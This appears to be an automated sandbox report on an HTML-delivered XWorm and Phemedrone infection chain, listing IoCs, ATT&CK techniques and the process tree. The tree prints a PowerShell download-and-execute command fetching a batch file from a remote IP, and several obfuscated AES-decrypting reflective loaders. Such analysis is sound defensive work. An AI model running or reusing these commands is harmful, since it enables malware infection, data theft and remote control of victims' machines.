phemedrone | a637b82debf0e7c1b3167b921d7cb7386f80b399ae5c23e7fd342e3873977870

Resubmissions

28-05-2024 17:38

240528-v7t16sde7z 10

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
28-05-2024 17:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2v6pTG.html
Size

500B
MD5

628907342bd222d29d8ee5a7af8474b9
SHA1

55aa19207183854c9eff6004675392db4cb743e4
SHA256

a637b82debf0e7c1b3167b921d7cb7386f80b399ae5c23e7fd342e3873977870
SHA512

8fbb7d78a21584cfbcb78ead273f120e85e54294eb42aa131f8245a4fdf28d6d3bfeb3fa47df3fdb3645d8c6c912eedcf95c8bfae341d7ad98b159afbae4d49f

Score

10^/10

phemedrone xworm execution rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

yXLtzgVbIXdYh5zs

Attributes

install_file
USB.exe
pastebin_url
http://pastebin.com/raw/e2U0xTFK

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1612-247-0x000001E6F1C10000-0x000001E6F1C1E000-memory.dmp	family_xworm

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

66 1992 powershell.exe
68 1828 powershell.exe
70 4944 powershell.exe
78 1612 powershell.exe
79 1612 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

1992 powershell.exe
1828 powershell.exe
4944 powershell.exe
1612 powershell.exe
Drops startup file 1 IoCs

Processes:

cscript.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shortcut.lnk cscript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

76 pastebin.com
79 pastebin.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
66	1992	powershell.exe
68	1828	powershell.exe
70	4944	powershell.exe
78	1612	powershell.exe
79	1612	powershell.exe

pid	process
1992	powershell.exe
1828	powershell.exe
4944	powershell.exe
1612	powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shortcut.lnk	cscript.exe

flow	ioc
76	pastebin.com
79	pastebin.com

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133613915152193250"	chrome.exe

Modifies registry class 2 IoCs

Processes:

chrome.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exepowershell.exe7zFM.exepowershell.exepowershell.exepowershell.exe

pid	process
564	chrome.exe
564	chrome.exe
3268	chrome.exe
3268	chrome.exe
1992	powershell.exe
1992	powershell.exe
2040	7zFM.exe
2040	7zFM.exe
2040	7zFM.exe
2040	7zFM.exe
1828	powershell.exe
1828	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
1612	powershell.exe
2040	7zFM.exe
2040	7zFM.exe
2040	7zFM.exe
2040	7zFM.exe
1612	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe
4944	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid process

2040 7zFM.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

chrome.exe

pid process

564 chrome.exe
564 chrome.exe
564 chrome.exe
564 chrome.exe
564 chrome.exe

pid	process
2040	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe
Token: SeShutdownPrivilege	564	chrome.exe
Token: SeCreatePagefilePrivilege	564	chrome.exe

Suspicious use of FindShellTrayWindow 46 IoCs

Processes:

chrome.exe7zFM.exe

pid	process
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
2040	7zFM.exe
2040	7zFM.exe
2040	7zFM.exe
2040	7zFM.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

chrome.exe

pid	process
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe
564	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 564 wrote to memory of 628	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 628	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 4696	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 3588	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 3588	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe
PID 564 wrote to memory of 2488	564	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\2v6pTG.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ff96032ab58,0x7ff96032ab68,0x7ff96032ab78
2⤵
PID:628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:2
2⤵
PID:4696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:8
2⤵
PID:3588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:8
2⤵
PID:2488

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2964 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:1
2⤵
PID:1216

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2972 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:1
2⤵
PID:3368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4420 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:8
2⤵
PID:2928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4264 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:8
2⤵
PID:4804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4800 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:1
2⤵
PID:1736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4308 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:1
2⤵
PID:2284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3404 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:1
2⤵
PID:3876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:8
2⤵
PID:3820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:8
2⤵
PID:464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5020 --field-trial-handle=1904,i,1150906614726184034,12008536649362939278,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3268

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4996

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3472

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\RoShade.zip"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:2040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://94.156.71.194/btgegeg/3er3vf/wwa/waf/microsoft.bat' -OutFile 'C:\Users\Admin\AppData\Roaming\microsoft.bat'; start C:\Users\Admin\AppData\Roaming\microsoft.bat"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\microsoft.bat" "
3⤵
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4JgDJn885Vtk9kXzdasX6VEk00I0MHmnqU3IYhRxQnI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('psMf0hNEIHmu2uNc00lR7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rbKLR=New-Object System.IO.MemoryStream(,$param_var); $fRLxG=New-Object System.IO.MemoryStream; $CqArO=New-Object System.IO.Compression.GZipStream($rbKLR, [IO.Compression.CompressionMode]::Decompress); $CqArO.CopyTo($fRLxG); $CqArO.Dispose(); $rbKLR.Dispose(); $fRLxG.Dispose(); $fRLxG.ToArray();}function execute_function($param_var,$param2_var){ $JOHqw=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ctAKP=$JOHqw.EntryPoint; $ctAKP.Invoke($null, $param2_var);}$LMHPX = 'C:\Users\Admin\AppData\Roaming\microsoft.bat';$host.UI.RawUI.WindowTitle = $LMHPX;$xZSRD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LMHPX).Split([Environment]::NewLine);foreach ($fsrEi in $xZSRD) { if ($fsrEi.StartsWith('pYpomJHyTzzsFzVrsckE')) { $dxZfO=$fsrEi.Substring(20); break; }}$payloads_var=[string[]]$dxZfO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
4⤵
PID:4676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\n.cmd"
5⤵
PID:5040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BUKFDk3RihhDJG4WuzsBxq2knn8+tbkRzQg7F0ncmHs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aTo03Y9F7dwpLqQixB2UGg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HcKMC=New-Object System.IO.MemoryStream(,$param_var); $axHbM=New-Object System.IO.MemoryStream; $NgPoX=New-Object System.IO.Compression.GZipStream($HcKMC, [IO.Compression.CompressionMode]::Decompress); $NgPoX.CopyTo($axHbM); $NgPoX.Dispose(); $HcKMC.Dispose(); $axHbM.Dispose(); $axHbM.ToArray();}function execute_function($param_var,$param2_var){ $CiUEX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aeGil=$CiUEX.EntryPoint; $aeGil.Invoke($null, $param2_var);}$rkZmT = 'C:\Users\Admin\AppData\Local\n.cmd';$host.UI.RawUI.WindowTitle = $rkZmT;$XydCu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($rkZmT).Split([Environment]::NewLine);foreach ($IbpiN in $XydCu) { if ($IbpiN.StartsWith('YgciVbmwZKUHbGUATRbY')) { $NTCvy=$IbpiN.Substring(20); break; }}$payloads_var=[string[]]$NTCvy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:3792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\c.cmd"
5⤵
PID:2420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kdtQ+8Wh8E6X19x0Zt/YZBpb4RnvAUNj8hLgOPwndrA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0m6iWUH2rII+nRLmQ9O3vA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zNFlk=New-Object System.IO.MemoryStream(,$param_var); $cjrSR=New-Object System.IO.MemoryStream; $xpRyP=New-Object System.IO.Compression.GZipStream($zNFlk, [IO.Compression.CompressionMode]::Decompress); $xpRyP.CopyTo($cjrSR); $xpRyP.Dispose(); $zNFlk.Dispose(); $cjrSR.Dispose(); $cjrSR.ToArray();}function execute_function($param_var,$param2_var){ $tGfBX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BounH=$tGfBX.EntryPoint; $BounH.Invoke($null, $param2_var);}$VGndy = 'C:\Users\Admin\AppData\Local\c.cmd';$host.UI.RawUI.WindowTitle = $VGndy;$CqrpF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VGndy).Split([Environment]::NewLine);foreach ($SlErN 